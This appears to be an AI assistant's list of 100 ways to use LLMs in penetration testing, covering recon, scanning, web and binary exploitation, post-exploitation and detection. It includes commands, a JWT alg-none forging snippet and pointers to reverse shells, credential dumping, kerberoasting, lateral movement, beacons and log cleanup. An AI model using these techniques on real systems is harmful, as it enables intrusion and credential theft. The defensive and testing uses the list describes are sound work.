**100 concrete things to explore** when using LLMs to assist penetration testing
Each item has: a short description, an example LLM prompt you can use immediately, and a low-level next step (command, code snippet or approach) you can run or adapt. I grouped items into categories so you can pick a pathway (recon → exploit → post-exploit → automation → defenses). I also cite a few foundational open-source tools you’ll want to integrate LLM output with. (GitHub)
Quick note on safety: use these only on systems you own or have explicit permission to test. LLMs can accelerate offensive work — use responsibly.
Reconnaissance (1–18)
-
Passive OSINT profile of a target domain
Prompt: “Collect open-source intelligence about example.com: subdomains, public cloud buckets, DNS history, leak pastebin hits.”
Next step: runsubfinder/amassor have the LLM produceamass enum -d example.com+ parsing script. -
Enumerate subdomains using wordlists
Prompt: “Generate a prioritized subdomain wordlist for example.com based on its business, technologies, and country.”
Next step: feed list intomassdnsornaabufor fast resolution. -
Fingerprint web technologies from a homepage
Prompt: “Given this HTTP response header and HTML, identify frameworks, versions and likely plugins.”
Next: LLM outputs fingerprint rules used to generatewhatweb/wappalyzersignatures or custom regex. -
Find exposed Git metadata (
/.git)
Prompt: “Write a script that checks for /.git existence and pulls files safely (no destructive actions).”
Next step: usecurl -sL http://target/.git/HEADand the LLM’s script to fetch only files listed. -
Locate cloud buckets and S3 misconfigurations
Prompt: “Given the company name and region, produce candidate S3/bucket names and a check script for public read/list.”
Next step:aws s3api head-bucket --bucket candidateor LLM-produced Python usingboto3with anonymous client. -
Profile email addresses and possible password reset flows
Prompt: “Map public email formats, password-reset URLs, and CSP/anti-CSRF protections for staff@company.”
Next step: LLM produces curl sequences to test password reset endpoints and parse tokens. -
Create prioritized vulnerability checklist
Prompt: “Given technologies [Nginx, Django, Postgres], list high-probability CVEs and detection checks.”
Next step: generatenmapNSE script commands orcve-searchqueries. -
Map network ranges from DNS and BGP
Prompt: “From these IPs and ASN, identify the likely upstream netblocks and cloud providers.”
Next step: LLM produceswhois,bgpvieworipinfoAPI call sequences. -
Harvest JS files and analyze interesting functions
Prompt: “Download JS files from /static and summarize functions that handle auth, tokens or crypto.”
Next step: LLM outputs static analysis heuristics and a Python script usingrequests+ AST parsing withesprimaor regex. -
Detect API endpoints and parameters
Prompt: “Given XHR request logs, extract REST endpoints, parameters, and possible injection points.”
Next step: LLM formats Burp/OWASP ZAP scanner policy orcurlcalls for fuzzing. -
Detect leaked credentials in commits
Prompt: “Write a program to scan discovered Git history for AWS keys, with safe false-positive filters.”
Next: LLM produces agit log --prettyparser + regex for AWS key patterns. -
Create adaptive reconnaissance playbook
Prompt: “Write a reconnaissance playbook that adapts based on results (e.g., if WordPress found → run plugin enumeration).”
Next: export as YAML for an automation tool (Ansible/Makefile) or a Python orchestration script. -
Use LLM to triage open ports
Prompt: “Given a list of open ports from Nmap, rank them by likely exploitability and suggest exact fingerprint commands.”
Next: LLM suggestsnmap -sV --scriptlines and prioritized exploits. -
Construct targeted search engine dorks
Prompt: “Produce Google dorks / Bing queries to find documents, exposed dashboards, or backup files for example.com.”
Next: LLM returns a list; validate manually — don’t run automated scraping of search engines. -
Generate prioritized wordlists for brute force
Prompt: “Build a prioritized username + password list for company using naming conventions and public bios.”
Next: usehydraorcrowbarwith rate limits and the LLM’s list. -
Discover mobile app endpoints from APKs
Prompt: “Given an APK package name, extract server endpoints, API keys placeholders, and create static analysis script.”
Next: LLM suggestsjadxcommands and regex to extractstrings.xml/build.gradleendpoints. -
Identify likely CI/CD pipeline leakage
Prompt: “List signs in repo/site that indicate CI secrets leaked (e.g., webhook URLs, artifacts).”
Next: LLM outputs regex andgit grepcommands to run on mirrored repos. -
Threat modeling of the target
Prompt: “Create a STRIDE/attack-tree for e-commerce site: asset list, attacker goals, and high-probability attack paths.”
Next: LLM emits a JSON attack tree usable by risk management tools.
Scanning & Service Enumeration (19–32)
-
Automate port/service scanning workflow
Prompt: “Write a pipeline: host discovery → fast port scan → service detection → vuln scan; include command examples.”
Next:nmap -sn→naabu -p-→nmap -sV -sCas LLM produces wrapper script. -
Generate tuned Nmap scan profiles
Prompt: “Produce Nmap command tuned for stealth vs speed for a given target and network conditions.”
Next: examples: stealthnmap -sS -Pn -T2 -p-vs fastnmap -T4 -p- --min-rate. -
Write custom NSE scripts with LLM assistance
Prompt: “Generate an Nmap NSE script that checks for exposed.gitrepositories and fetches HEAD only.”
Next: LLM outputs NSE skeleton (Lua) — save as.nseand runnmap --script ./check-git.nse. -
Automate banner/protocol fuzzing
Prompt: “Create a small Python fuzzer for FTP commands to find parsing crashes.”
Next: LLM providessocket-based fuzzer that mutates commands and logs responses. -
Service fingerprinting via active probes
Prompt: “List active probes to differentiate Apache/Tomcat/nginx even when headers are modified.”
Next: LLM suggests probes (error pages, HTTP methods, OPTIONS, TRACE) and regex for responses. -
Enumerate SMB and Windows shares safely
Prompt: “Write a script using Impacket to list SMB shares and check anonymous access.”
Next: LLM providesimpacket.smbconnectionusage example to call from Python. (GitHub) -
Automate SSH host key collection and weak config detection
Prompt: “Collect SSH host keys and test for weak kex/ciphers and password auth enabled.”
Next: LLM outputsssh-auditinvocation ornmap --script ssh2-enum-algos. -
Identify exposed databases and default credentials
Prompt: “Scan for exposed database ports and attempt safe read-only queries using known creds list.”
Next: LLM provides connection strings andpsql -h host -U user -c '\l'ormysql -e 'SHOW DATABASES;'. -
Web service parameter enumeration
Prompt: “Given endpoint /api/search?q=, create a list of parameters to probe and a fuzzing policy.”
Next: integrate withffuforwfuzzusing LLM’s generated wordlists. -
TLS & certificate analysis
Prompt: “Analyze the target’s TLS chain for weak ciphers, expired intermediates, and misissued certs.”
Next: runopenssl s_client -connect host:443 -showcertsand LLM parses output into findings. -
SSH/HTTP timing analysis for side channels
Prompt: “Create a test harness that measures response timing differences to detect username enumeration.”
Next: LLM outputs Python withrequeststiming and statistical test (t-test). -
Identify exposed CI artifacts (Docker images, registries)
Prompt: “Scan for open container registries and attempt to list repositories (read-only).”
Next:curl -s https://registry.example.com/v2/_catalogor LLM’s script with pagination. -
Find insecure service configurations (default pages, debug endpoints)
Prompt: “Detect common debug endpoints: /debug, /actuator, /env, /wp-admin/admin-ajax.php; prioritize by probability.”
Next: LLM outputsffuf -wpatterns to scan. -
Integrate scanner outputs into single JSON
Prompt: “Write a parser that normalizes Nmap, OpenVAS and Burp output into a single JSON vulnerability inventory.”
Next: LLM returns Python usingxmltodictand mapping rules.
Web Application Testing (33–54)
-
Automate SQL injection detection and payload generation
Prompt: “Given an endpoint and parameter, produce SQLi payload sequences (boolean, time-based, error) and detection logic.”
Next: integrate withsqlmapor the LLM’s payloads forrequestsfuzzing. (GitHub) -
LLM-assisted parameter pollution tests
Prompt: “Generate test cases for HTTP parameter pollution and duplicate parameter handling.”
Next: LLM outputscurlorBurpintruder payload sets. -
Cross-site scripting (XSS) payload synthesis
Prompt: “Create context-aware XSS payloads for HTML body, attribute, JS, and JSON contexts, with encodings.”
Next: LLM provides strings; test withffuf+--matchon reflection. -
CSRF detection and exploit generation
Prompt: “Find forms without CSRF tokens and produce an HTML exploit that automatically submits.”
Next: LLM crafts the exploit HTML form for proof-of-concept. -
Auth bypass and logic flaws
Prompt: “Given a login flow with step descriptions, find logic race or sequence bugs (e.g., email change without reauth).”
Next: LLM proposes test sequences and replay scripts. -
Automate forced browsing / hidden links discovery
Prompt: “Enumerate hidden endpoints via JS parsing, sitemap, robots.txt and brute force.”
Next: LLM provideswget/greppipeline to extract URLs and pass toffuf. -
Header injection and host header attacks
Prompt: “Generate attacks that manipulate Host, X-Forwarded-For and other headers to test trust boundaries.”
Next: LLM suppliescurl -Hcommands and expected server behaviors. -
Automate file upload bypasses
Prompt: “Create a list of bypasses for file extension/content checks (double extension, content sniffing, magic bytes).”
Next: LLM provides Python script that crafts multipart uploads with altered headers and magic bytes. -
Detect insecure deserialization
Prompt: “Explain how to probe Java/PHP/Python deserialization endpoints and generate proof-of-concept payloads.”
Next: LLM producesysoserial/PhpGGCusage or serialized payload templates. -
API abuse: excessive rate and logic manipulation
Prompt: “Design test cases to abuse pagination, bulk endpoints, and quota systems.”
Next: LLM generates scripts usingaiohttpfor concurrency and test orchestration. -
SSRF detection and exploitation workflow
Prompt: “Find SSRF via URL-type parameters and craft OOB detection using collaborators (Burp Collaborator / interactsh).”
Next: LLM suppliescurlcalls that redirect to interactsh payloads. -
Auth token analysis (JWT)
Prompt: “Given a JWT, decode, check algorithms (alg none), critical claims, and craft a forge test.”
Next: LLM gives code:jwt.decode(tok, options={"verify_signature": False})and script to alteralg. -
Automate business-logic testcases
Prompt: “Given e-commerce flow, generate tests for price manipulation, discount stacking, and inventory race conditions.”
Next: LLM outputs sequences and sample HTTP bodies for concurrent requests. -
Plugin and framework exploit hunting (WordPress, Drupal)
Prompt: “If WordPress vX.Y is detected, list high-probability vulnerable plugins and proof-of-concept checks.”
Next: LLM draftswpscanargs and plugin enumeration strategies. -
Identify insecure CORS configurations
Prompt: “Given response headers, evaluate CORS policy and craft a malicious origin exploit if vulnerable.”
Next: LLM builds a PoC HTML that performs an XHR from a malicious origin. -
Automated Content Security Policy (CSP) analysis
Prompt: “Analyze CSP header and report misconfigurations that allow inline script execution or unsafe eval.”
Next: LLM outputs canonical checks and mitigation suggestions. -
Automate detection of backup files and source leaks
Prompt: “Create checks for typical backup filenames (.bak, .swp, ~, .sql.gz) and crawling policy.”
Next: LLM providesffuf -wtemplate for backup discovery. -
Use LLM to write Burp extensions
Prompt: “Generate a Burp extension (Jython or Java) to detect a custom token pattern and highlight requests.”
Next: LLM outputs extension skeleton — compile / load into Burp Extender (note: Burp API required). -
GraphQL security exploration
Prompt: “Enumerate GraphQL schema, generate introspection queries, and create complexity/fuzzing tests.”
Next: LLM craftscurl -X POST -d '{"query":"{__schema{types{name}}}"}'and rate/complexity tests. -
SSO and OAuth misconfiguration testing
Prompt: “Test for open redirectors, weak client secrets, and scope escalation in OAuth flows.”
Next: LLM generates OAuth flow sequences and checklists for redirect URIs. -
Automated detection of client-side logic vulnerabilities
Prompt: “Find dangerous client-side evals, dynamic script insertion points and CSP bypass vectors.”
Next: LLM gives regex to findeval(,new Function,innerHTML =. -
Fuzz JSON and binary endpoints with context-awareness
Prompt: “Create a grammar-aware fuzzer for JSON APIs that mutates specific fields intelligently.”
Next: LLM outputs a Python grammar mutation engine usingjsonschemato keep valid shapes.
Exploit Development & Binary Testing (55–69)
-
Use LLMs to write exploit skeletons from CVEs
Prompt: “Given CVE-YYYY-NNNN details, produce an exploit skeleton in Python and explain required adjustments.”
Next: LLM outputs a proof-of-concept and guidance to adapt offsets and gadgets. -
Automate buffer-overflow triage
Prompt: “Given a crash log and core dump, produce steps to find the crash point, register state and possible exploit vectors.”
Next: LLM suggestsgdbcommands andpwndbgchecks (use pwntools for payloads). (GitHub) -
Create ROP gadget chains automatically
Prompt: “Automate gadget discovery and chain generation for a given binary and ABI.”
Next: LLM producesropperorragg2commands and how to combine gadgets withpwntools. -
Automate format-string exploit generation
Prompt: “Given a format-string leak and memory layout, generate payloads to write to arbitrary addresses.”
Next: LLM outputsprintfwrite plans and example exploit code. -
Binary instrumentation harness generation
Prompt: “Create an AFL/LibFuzzer harness for this library function with seed corpus and sanitizer flags.”
Next: LLM emits C harness, compile flags, and suggestions for ASAN/UBSAN. -
Automate heap spraying / heap feng shui scenarios
Prompt: “Given a vulnerable allocator, produce a sequence to shape the heap layout prior to the vulnerability trigger.”
Next: LLM outlinesmalloc/freepatterns and example PoC code in C. -
Symbolic execution harness with angr
Prompt: “Write an angr script to find inputs that reach a vulnerable function.”
Next: LLM returnsangrskeleton (project load, entry state, exploration). -
Automate reverse shell payload creation
Prompt: “Generate a platform-aware reverse shell payload in C/Python that avoids null bytes and explains constraints.”
Next: LLM produces shellcode or small binary wrapper; test in controlled VM. -
Exploit reliability improvements
Prompt: “How to add heap-spray, retries, and NOP sleds to improve exploit stability across ASLR variations.”
Next: LLM provides code patterns and fallback sequences. -
Automate gadget finding with ROPgadget/objdump
Prompt: “Find gadgets for x86_64 and generate a minimal payload to call system(‘/bin/sh’).”
Next: LLM givesROPgadget --binary=binaryandpwntoolspayload assembly. -
Write kernel exploit triage checklist
Prompt: “Given a kernel crash log (oops), produce a triage plan for exploitability and required environment.”
Next: LLM lists required kernel symbols, debug info and harness suggestions. -
Automate exploit verification and sandboxing
Prompt: “Create a VM automation script to safely run an exploit and capture network callbacks.”
Next: LLM outputsVagrant/libvirtordockercommands to spin up test env. -
Fuzz network protocol implementations
Prompt: “Construct a grammar fuzzer for a custom TCP protocol with stateful interactions.”
Next: LLM provides Python harness usingscapy/boofuzz. -
Binary patch generation script
Prompt: “Given a patch diff, generate a binary patch (bspatch/bsdiff) and test script.”
Next: LLM explainsobjdump/lddchecks and providesbspatchusage. -
Automate symbolic patch detection across versions
Prompt: “Detect changed functions between binary versions to find likely fixed vulnerabilities.”
Next: LLM outputsradiff2orBinDiffautomation hints.
Post-exploitation & Lateral Movement (70–81)
-
Password/credential harvesting automation
Prompt: “Given access to a Windows host, enumerate cached credentials, DPAPI blobs and LSA secrets safely.”
Next: LLM references commands and Impacket/PowerSploit equivalents (note: use only in allowed environment). (GitHub) -
Automate persistence checks and proof scripts
Prompt: “List common persistence mechanisms on Linux and Windows and produce detection queries.”
Next: LLM givessystemdservice checks, cron, startup folder scans. -
Enumerate Active Directory via LDAP and Kerberos
Prompt: “Create an Impacket/LDAP script to enumerate users, groups, SPNs, and test for unconstrained delegation.”
Next: LLM outputsimpacket/examples/GetUserSPNs.pystyle usage and parsing. (GitHub) -
Kerberoasting and AS-REP roasting workflows
Prompt: “Implement a Kerberoast/AS-REP roast PoC using Impacket and explain decryption steps.”
Next: LLM generates commands andhashcatexample cracking modes. -
SSH pivot automation and SOCKS chaining
Prompt: “Create an SSH-based pivot script that sets up dynamic port forwarding and routes traffic through compromised host.”
Next: LLM outputsssh -D 1080 -N -f user@hostandproxychainsconfig. -
Automated lateral movement via SMB/PSExec
Prompt: “Given valid creds, automate remote command execution using SMB and SMBNamedPipe (impacket psexec).”
Next: LLM givesimpacket/examples/psexec.pyusage and safe logging. -
Data exfiltration simulation (safe)
Prompt: “Simulate an exfil test with staged and encrypted channels to a test collector, minimize noise.”
Next: LLM suggests chunking, AES encryption, and timing obfuscation. -
Credential replay detection
Prompt: “Create SIEM detections for unusual Kerberos TGS requests and replay patterns.”
Next: LLM outputs sample Sigma rules. -
Automate cleanup & forensic artifacts generation
Prompt: “List files, registry keys, and logs that an operator must clear after lateral movement (for simulation).”
Next: LLM provides scripts to revert changes in isolated lab. -
Build automated discovery of Windows GPOs and security settings
Prompt: “Enumerate GPO applied settings and privileges to find likely weak local admin configurations.”
Next: LLM providesPowerShellcommands (Get-GPOReport) and parsing. -
Privileged escalation toolkit automation
Prompt: “Given kernel & installed software versions, suggest likely local privilege escalation paths and PoCs.”
Next: LLM references local exploits (search terms) and suggests safe testing harness. -
Deploy beacon / callback frameworks for testing
Prompt: “Generate a minimal HTTPS beacon that sleeps and polls for commands; include JARM-friendly options.”
Next: LLM gives C/Python/Go beacon skeleton (use only in permitted tests).
Automation, Orchestration & LLM-Specific (82–95)
-
LLM prompt engineering for vuln triage
Prompt: “Given scan output, produce a short classification (false pos/likely vuln/needs manual check) and remedial steps.”
Next: LLM can output a triage JSON mapping fields to priority. -
LLM as an interactive pentest assistant (chat agent)
Prompt: “Build an agent that loads scanner output, accepts questions, and issues follow-up scanner commands.”
Next: LLM provides architecture: vector store for context, tool calls tonmap/sqlmap, and prompt templates. -
Automate exploit parameter extraction from PoCs
Prompt: “Parse a text PoC and extract targets, offsets, required versions, and build a checklist.”
Next: LLM returns structured data that can feed CI pipelines. -
Create LLM-driven fuzzing hypotheses
Prompt: “Propose likely malformed inputs for this API based on observed parsing behavior.”
Next: generate grammar rules used byboofuzz/aflharnesses. -
LLM building of YARA rules from observed malware artifacts
Prompt: “Given sample strings and file metadata, create a tight YARA rule with metadata and tags.”
Next: LLM emits YARA syntax and test harness foryaraCLI. -
Integrate LLMs with CI for continuous pentest scans
Prompt: “Design a pipeline that runs scheduled scans, then uses an LLM to triage and open JIRA tickets.”
Next: LLM outputs YAML for GitHub Actions or GitLab CI that calls scanners and posts results. -
LLM to convert natural language findings into exploit scripts
Prompt: “Translate this finding: ‘SQLi at /search?q=’ into a runnable exploit script that tests payload set A.”
Next: LLM producesrequests-based PoC andsqlmapcommands. -
Automate report drafting from raw findings
Prompt: “Produce an executive summary + technical appendix from the following JSON scanner output.”
Next: LLM transforms into markdown or PDF-ready sections. -
Create guided remediation guides with code fixes
Prompt: “Given this XSS proof-of-concept, generate framework-specific fixes (Django, Express) and code patches.”
Next: LLM outputs code diffs and patch commands. -
LLM to summarize patch diff & exploitability
Prompt: “Given a GitHub commit diff, explain if it fixes an RCE and how an attacker abused it.”
Next: LLM highlights lines and suggested tests. -
Train a lightweight local LLM with your pentest corpus
Prompt: “How to fine-tune a small model on my internal PoC and scan logs to improve recommendations?”
Next: LLM produces data curation steps (anonymize, label) and training script hints. -
Create a plugin that turns LLM suggestions into Burp intruder payloads
Prompt: “Generate a Burp extension that takes LLM output, formats it into an Intruder payload set and starts attack.”
Next: LLM gives extension skeleton and API use. -
Automate regulatory & compliance mapping for findings
Prompt: “Map each vulnerability to OWASP Top10, PCI DSS, and recommended CIS control.”
Next: LLM outputs mapping table and remediation priority. -
Adversarial prompt testing for LLMs used in triage
Prompt: “Design tests to show how an LLM triage assistant can be tricked by adversarial artifacts.”
Next: LLM suggests test cases and mitigations (input sanitization, TTL for context).
Detection, Blue Team, and Defensive Use (96–100)
-
Generate detection signatures from PoC network IOCs
Prompt: “From this exploit’s network behavior, generate Snort/Suricata rules and Zeek scripts.”
Next: LLM outputs rule examples and testing pcap harness. -
Convert findings to Sigma, YARA, and Suricata rules
Prompt: “Produce a Sigma rule to detect suspicious Windows command lines seen in PoC.”
Next: LLM emits Sigma YAML and a test event to validate. -
Automate threat hunting playbooks
Prompt: “Given a lateral movement PoC, create a step-by-step hunt playbook for SOC analysts.”
Next: LLM returns checklist, queries for Splunk/ELK and exact fields. -
Hardening scripts for typical misconfigurations
Prompt: “Provide idempotent Ansible/PowerShell scripts to remediate the top 10 findings in this scan.”
Next: LLM generates Ansible roles and PowerShell DSC snippets. -
Blue/Red team tabletop automation
Prompt: “Create a tabletop scenario that simulates exploitation of an exposed app, with detection triggers and automated scoring.”
Next: LLM produces scenario timeline, detection rules, and scoring rubric.
Example low-level code snippets (quick reference)
- Nmap NSE skeleton (Lua) — save as
check-git.nsethen runnmap --script check-git.nse
description = [[Check for /.git HEAD]]
author = "LLM-assisted"
categories = {"discovery"}
portrule = shortport.http
action = function(host, port)
local url = "http://"..host.ip..":"..port.number.."/.git/HEAD"
local resp = http.get(url)
if resp and resp.status == 200 then
return "Found /.git/HEAD: "..(resp.body:sub(1,200))
end
return nil
end
- Simple Python script to test JWT alg none
import jwt, base64, json
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
hdr,pl,sig = token.split('.')
decoded_header = json.loads(base64.urlsafe_b64decode(hdr + '=='))
decoded_payload = json.loads(base64.urlsafe_b64decode(pl + '=='))
print("Header:", decoded_header)
print("Payload:", decoded_payload)
# Test by setting alg to none
new_hdr = base64.urlsafe_b64encode(b'{"alg":"none","typ":"JWT"}').decode().rstrip('=')
new_token = new_hdr + '.' + pl + '.'
print("Test token:", new_token)
- Impacket usage example for share enumeration
python3 /path/to/impacket/examples/smbclient.py domain/username:password@target
# or from Python using Impacket's SMBConnection class per repo examples.
(see Impacket examples for exact API). (GitHub)
Tooling & Repos to integrate (start here)
- Metasploit Framework — Rapid7 (exploit dev & modules). (GitHub)
- sqlmap — automated SQLi and takeover tool. (GitHub)
- Nmap — network discovery and NSE scripting. (GitHub)
- Impacket — low-level Python network protocol classes for SMB/Kerberos. (GitHub)
- pwntools — exploit dev & binary tooling. (GitHub)
If you want, I can now do one of these concretely for you (for example: produce an LLM-tuned ffuf or nmap pipeline + wrapper script for recon, or generate specific PoC payloads for a web parameter you paste). Pick one item number and I’ll produce the full runnable script + testing instructions (no background tasks — I’ll generate it right here).